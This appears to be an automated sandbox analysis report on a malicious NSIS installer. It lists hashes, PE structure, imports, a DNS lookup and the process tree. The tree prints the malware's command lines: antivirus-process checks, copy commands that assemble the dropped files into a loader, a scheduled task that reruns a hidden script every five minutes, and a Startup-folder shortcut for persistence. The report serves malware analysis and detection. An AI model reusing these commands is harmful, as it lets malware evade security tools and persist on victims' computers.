SHA-256:	578039840A13F711610A0048D723BCF64D1BF5844DA53D0C3959A6DEEC7CFCA6
SHA-512:	AC321081300E1AEFE7706C66348733F3750E59938EF4E80A5BCE1AEBE076BDF1267CCEEF43CF1FA1B03A7BF07255C462FC3EEC83AD32B93D914F4299AE53F9FE
Malicious:	false
Preview:	.eC%....n.,..pP..".`...B?6.^..2b>..P..t.)9_.........U.q}.Xl...>.'.i.q.G}...f..J.^W.s...M..q8z7..e..J..pB.."..V.".;;.a.QC.:.D.X4...a...1.#...r....[..,.1..D...m...Yj[@lc.V.{[.../..\..#.....3......;.B..H....Z.\|k.........."..T.9..si..4.U...c.......(.e.J.M..w[.D5^US..;....br..N....6.\|>..H%.Da.<`>..uBo...R.)..z}..:Q.4.q..I..5".u.C.H...Q.+...,M.?.A..#@\|.).Bly.0.G..5...... .....fy...o..J.J.u.H...2.V.z7["heE..,O......b.....y.d.[G/.g..(d:.O.Y%.....v..kv........v\..7.W.].q).P..\|.;.m......uy#..u.Q&..]......)..)d.{...`c.6..;9-.....l\|..`.\y..e\|O.._aSi.....<.^ro..*...`R...G_>e.zh6R,...Me$v.......Q......x...>{....9.\|$!..px..X..0..Y.ysQ+.G.f'......+..0y:}I.=...P...?..4Q..Q5I.K..;.j~...i.);.........uM..`~U'.3y..\|k.......c.9..0.n....r....c.p.5./...l..n..s....j\.M\|.spJP.r......'p..6.s .r.}.E..3.....v,.vh....^C.FT.P/.....u.VL.2... cK...0[+.f.'/tq...l.6......+..(bZ.@.....o..M...)v...-h8.0.....I...vX.0mL..@7....N..3.-...ha..[M..d.....f(.F[..r......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	4.792949440895037
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYot+kiE2J52A3EJ01+FyNc:HRYF5yjowkn232AUJ0IFn
MD5:	313B9EEB836F9D4D395E007B3D03FA08
SHA1:	BBDC0E202DE277C5CBF47813ED366E4458D417ED
SHA-256:	BA103B92F9DDE102EFC6AB64651E9223591523A3076D1ABC2AC75B8FDA23161C
SHA-512:	D64AA2EE844BCE602B3E67C3F33D6BCAD53F5A54FD3EE1B5665F0010F4194A00C4E22E2CF3A1816F1D19005D80756E4CF5CA7C0CDD4879C56CC825FBFF7D08CC
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js" ..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.827189910944366
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe
File size:	1'414'800 bytes
MD5:	db2a12edc73769f2f2b6b01545afe2c3
SHA1:	73dc44fb0753296f51b851299f468031ceb77b54
SHA256:	e6db7d34b498982601b2c45ac5b2a1c1b9502e502514ccffae9862f2aa719f42
SHA512:	dadf36bc9c5d88c28b9064892cc263c912ce668435b71802df756c0a4e680f8407011d36498a2511dda7165aea866c0ae794f9ec8fbcc42c7da1661399316ce4
SSDEEP:	24576:UzZ1Futzu9df939+wlQ+u6M6NrPLyPts+5+OgoSsKWF5DcJ14lWCqMYDe1EpmqIu:UvF4a9d9tnlQ+u96NyPtP5+1GKWF5gzn
TLSH:	846523837F90B2B1F2F09873B14A8A334F67BC2217930997A7197713A952412E74BF56
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.ydx..7x..7x..7_Hz7{..7_Hl7i..7x..7...7q..7s..7q..7y..7q..7y..7Richx..7........................PE..L....l.K.................h.

File Icon


Icon Hash:	1970e0f2faec7811

Static PE Info

General

Entrypoint:	0x403415
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4BC06CDA [Sat Apr 10 12:19:38 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	bf95d1fc1d10de18b32654b123ad5e1f

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00408570h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082B0h]
push 00000008h
mov dword ptr [0047B398h], eax
call 00007F77BCB53E9Ch
push ebp
push 000002B4h
mov dword ptr [0047B2B0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040856Ch
call dword ptr [00408180h]
push 00408554h
push 004732A0h
call 00007F77BCB53D6Ah
call dword ptr [004080B0h]
push eax
mov edi, 004CC0A0h
push edi
call 00007F77BCB53D58h
push ebp
call dword ptr [00408130h]
cmp word ptr [004CC0A0h], 0022h
mov dword ptr [0047B2B8h], eax
mov eax, edi
jne 00007F77BCB5173Ah
push 00000022h
pop esi
mov eax, 004CC0A2h
push esi
push eax
call 00007F77BCB53A2Ch
push eax
call dword ptr [00408250h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F77BCB517C1h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F77BCB51739h
inc esi
inc esi
cmp word ptr [esi], bx
je 00007F77BCB5172Bh

Rich Headers

Programming Language:

[ C ] VS2005 build 50727
[IMP] VS2005 build 50727
[ C ] VS2008 SP1 build 30729
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8afc	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xfd000	0x20ba8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2c0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x671c	0x6800	8bb8f6dca80ad27cbdbce9816ab6ae7c	False	0.6644381009615384	data	6.50478910452928	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x19d6	0x1a00	161b329b4c70ce4fbd9c1143e738896b	False	0.4480168269230769	data	5.026839717718007	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x7139c	0x200	140876ba314e7bc36379ee5c6db80876	False	0.271484375	data	1.7360077526852977	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x7c000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xfd000	0x20ba8	0x20c00	b2e5acfe8ecdd9b9c997145d9be621af	False	0.30429985687022904	data	3.926508664724272	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xfd220	0x11028	Device independent bitmap graphic, 128 x 256 x 32, image size 69632	English	United States	0.28367206338270756
RT_ICON	0x10e248	0x9928	Device independent bitmap graphic, 96 x 192 x 32, image size 39168	English	United States	0.3115690675372373
RT_ICON	0x117b70	0x5638	Device independent bitmap graphic, 72 x 144 x 32, image size 22032	English	United States	0.34034070315331644
RT_ICON	0x11d1a8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5611702127659575
RT_DIALOG	0x11d610	0x100	data	English	United States	0.5234375
RT_DIALOG	0x11d710	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x11d830	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x11d890	0x3e	data	English	United States	0.8387096774193549
RT_MANIFEST	0x11d8d0	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, MulDiv, lstrlenA, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, FindWindowExW, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, IsWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 31, 2024 10:01:57.218146086 CEST	61149	53	192.168.2.4	1.1.1.1
Aug 31, 2024 10:01:57.237687111 CEST	53	61149	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 31, 2024 10:01:57.218146086 CEST	192.168.2.4	1.1.1.1	0x26bc	Standard query (0)	CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 31, 2024 10:01:57.237687111 CEST	1.1.1.1	192.168.2.4	0x26bc	Name error (3)	CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN	none	none	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	04:01:53
Start date:	31/08/2024
Path:	C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe"
Imagebase:	0x400000
File size:	1'414'800 bytes
MD5 hash:	DB2A12EDC73769F2F2B6B01545AFE2C3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:01:53
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:01:53
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:01:54
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xf50000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:01:54
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0x9c0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:01:54
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xf50000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:01:54
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0x9c0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:01:55
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 684126
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:01:55
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "VegetablesIndividualBindingGba" Ever
Imagebase:	0x9c0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:01:55
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:01:55
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\684126\Intake.pif
Wow64 process (32bit):	true
Commandline:	Intake.pif C
Imagebase:	0xdd0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs Detection: 9%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	04:01:55
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xfe0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:01:56
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:01:56
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:01:56
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
Imagebase:	0x440000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:01:56
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:01:56
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	04:01:56
Start date:	31/08/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js"
Imagebase:	0x7ff7160f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:01:57
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif" "C:\Users\user\AppData\Local\SecureData Technologies\Y"
Imagebase:	0x310000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs Detection: 9%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	04:02:08
Start date:	31/08/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js"
Imagebase:	0x7ff7160f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	04:02:08
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif" "C:\Users\user\AppData\Local\SecureData Technologies\Y"
Imagebase:	0x310000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	04:04:22
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe
Imagebase:	0xcc0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	04:04:27
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	04:05:27
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe
Imagebase:	0x40000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	04:05:28
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe
Imagebase:	0x10000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	04:05:28
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe
Imagebase:	0x4b0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	04:05:33
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.3%
Total number of Nodes:	1322
Total number of Limit Nodes:	22

Executed Functions

Function 00403415 Relevance: 58.1, APIs: 22, Strings: 11, Instructions: 307
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403434
SetErrorMode.KERNELBASE(00008001), ref: 0040343F
OleInitialize.OLE32(00000000), ref: 00403446

Part of subcall function 00405BBF: GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
Part of subcall function 00405BBF: LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
Part of subcall function 00405BBF: GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB

SHGetFileInfoW.SHELL32(0040856C,00000000,?,000002B4,00000000), ref: 0040346E

Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5

GetCommandLineW.KERNEL32(004732A0,NSIS Error), ref: 00403483
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",00000000), ref: 00403496
CharNextW.USER32(00000000,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",00000020), ref: 004034BD
GetTempPathW.KERNEL32(00002004,004E00C8,00000000,00000020), ref: 00403590
GetWindowsDirectoryW.KERNEL32(004E00C8,00001FFF), ref: 004035A5
lstrcatW.KERNEL32(004E00C8,\Temp), ref: 004035B1
DeleteFileW.KERNELBASE(004DC0C0), ref: 004035C8
OleUninitialize.OLE32(?), ref: 00403659
ExitProcess.KERNEL32 ref: 00403679
lstrcatW.KERNEL32(004E00C8,~nsu.tmp), ref: 00403685
lstrcmpiW.KERNEL32(004E00C8,C:\Users\user\Desktop,004E00C8,~nsu.tmp), ref: 00403691
CreateDirectoryW.KERNEL32(004E00C8,00000000), ref: 0040369D
SetCurrentDirectoryW.KERNEL32(004E00C8), ref: 004036A4
DeleteFileW.KERNEL32(0043BD40,0043BD40,?,00480008,0040850C,0047C000,?), ref: 004036F5
CopyFileW.KERNEL32(C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe,0043BD40,00000001), ref: 00403709
CloseHandle.KERNEL32(00000000,0043BD40,0043BD40,?,0043BD40,00000000), ref: 00403736
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 0040378C
ExitWindowsEx.USER32(00000002,00000000), ref: 004037C8

Strings

C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe, xrefs: 00403704
NCRC, xrefs: 0040350C
SeShutdownPrivilege, xrefs: 0040379E
NSIS Error, xrefs: 00403474
/D=, xrefs: 00403537
